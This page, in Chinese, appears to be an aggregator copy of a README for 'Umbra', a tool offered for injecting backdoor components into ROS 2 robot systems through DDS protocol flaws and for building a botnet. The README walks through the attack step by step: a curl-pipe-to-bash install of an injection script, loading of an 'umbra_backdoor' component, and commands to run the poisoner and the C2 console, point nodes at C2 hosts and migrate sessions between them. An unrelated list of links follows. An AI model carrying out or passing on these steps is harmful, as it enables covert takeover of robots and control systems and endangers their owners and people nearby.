当前位置: 首页 > news >正文

Umbra(陰影):DDS底層協議漏洞遠程惡意組件注入Botnets

Umbra

地址:https://github.com/MartinxMax/Umbra

ROS 2 協定漏洞:遠端惡意元件注入工具

概述跨子網通訊限制、容器元件權限控制缺陷等安全性漏洞。報告的核心目標是:透過利用這些漏洞,構建一套可遠端控制多個 ROS 2 節點的 DDS 僵屍網路,實現對目標 ROS 2 主機的持久化控制與權限提升。

細節:Umbra_Report_XX.pdf

Umbra Poisoner

不依賴於 ROS 2 環境條件。

若你和目標位於同一區域網路(LAN),即可部署於你自己的主機上。

$ ./umbra_poisoner

image.png

Umbra Console

投毒器須使用參數 --c2 <IP>:<PORT> 連接到控制器。

$ ./umbra_console

image-1.png

Umbra Logger

記錄目標 LAN 中部署的 ROS 節點數量。

$ ./umbra_loger

image-2.png

Umbra 元件之本地注入:C2 會話遷移

  1. 將惡意元件初始化到正常的 ROS 2 系統中。

備註:在 exploit 目錄中有 injection_xxxxx.sh

(Ubuntu-192.168.0.113)$ curl http://server/injection_xxxxx.sh | bash

c422d66ad998b479aefc2693f1bbbbe8.png

(Ubuntu-192.168.0.113)$ ros2 component list

image-3.png

  1. 本地註冊惡意元件(若雙方的 Ubuntu 都已安裝 ROS 2,也可遠端註冊)
(Ubuntu-192.168.0.113)$ source /dev/shm/umbra_backdoor_install/setup.bash; \
ros2 component load /UMBRA_192_168_0_113 umbra_backdoor umbra --node-name injection

image-4.png

  1. 啟動 umbra_console 控制器
(Arch-192.168.0.112)$ ./umbra_console

image-5.png

  1. 啟動 umbra_loger 日誌器
(Arch-192.168.0.112)$ ./umbra_loger

image-6.png

  1. 啟動 umbra_poisoner 投毒器
(Arch-192.168.0.112)$ ./umbra_poisoner --c2 192.168.0.112:7010

image-7.png

  1. 在控制器中進入 session,設定節點參數並連接到 C2
Umbra# use 959145908c4f64af8292392d692b5669
Umbra[959145908c4f64af8292392d692b5669]# show
Umbra[959145908c4f64af8292392d692b5669]# set HC2F 192.168.0.112:7010
Umbra[959145908c4f64af8292392d692b5669]# set HC2S 192.168.0.112:443
Umbra[959145908c4f64af8292392d692b5669]# run

image-8.png

  1. 更新命令以將節點遷移到其他 C2 主機
Umbra[959145908c4f64af8292392d692b5669]# set HC2S xxxxx:xxxxx
Umbra[959145908c4f64af8292392d692b5669]# run

e2e78b60-2b7f-4494-a3e2-5a781ba29d77.png

http://www.dtcms.com/a/415106.html

相关文章:

  • 【自然语言处理与大模型】LlamaIndex快速入门②
  • 附近广告公司地址快速优化seo
  • 文心大模型4.5:百度推出的新一代原生多模态基础大模型
  • 厦门网站推广费用广西网站建设银行
  • 今日面试之项目拷打:锁与事务的深度解析
  • 基于IMX6ULL 芯片 UART1
  • Coze源码分析-资源库-删除数据库-后端源码-基础设施/数据存储层
  • 多后端服务器架构解析
  • 四种常用SVC(service)及其与Ingress协作方式
  • C#多线程全家桶:从Thread到async/await
  • 网站备案 论坛甘肃微信网站建设
  • 数模之路获奖总结——数据分析交流(R语言)
  • 网站 后台 数据 下载网站优化软件推荐
  • Java数据结构第二十七期:布隆过滤器,用 “模糊” 换高效的查重黑科技
  • 怎么做质量高的网站如何实现网站建设服务
  • 我的项目开发的一般流程,供交流
  • 做网站实名认证有什么用濮阳市城乡一体化示范区主任
  • InnoDB压缩技术:节省空间提升性能
  • 国任保险携手云轴科技ZStack获评鼎新杯数字化转型应用典型案例
  • 进入网站wordpress配置如何在百度搜到自己的网站
  • 建设银行网站怎么看不见余额专业类网站
  • qq登录网站授权怎么做外贸自建站平台哪个好
  • 红豆杉发展前景与培育技术(英文翻译稿)
  • 虾皮后端一面
  • 网站的新闻模块怎么做公司网络推广营销
  • 自己做刷东西的网站百度地图电脑版网页
  • 【开题答辩全过程】以 spb+疾病风险预警平台的设计与实现为例,包含答辩的问题和答案
  • 北京做百度网站有免费建网站
  • 国外的电商网站这么攻击网站
  • 新手卖家做来赞达网站如何如何用wordpress站群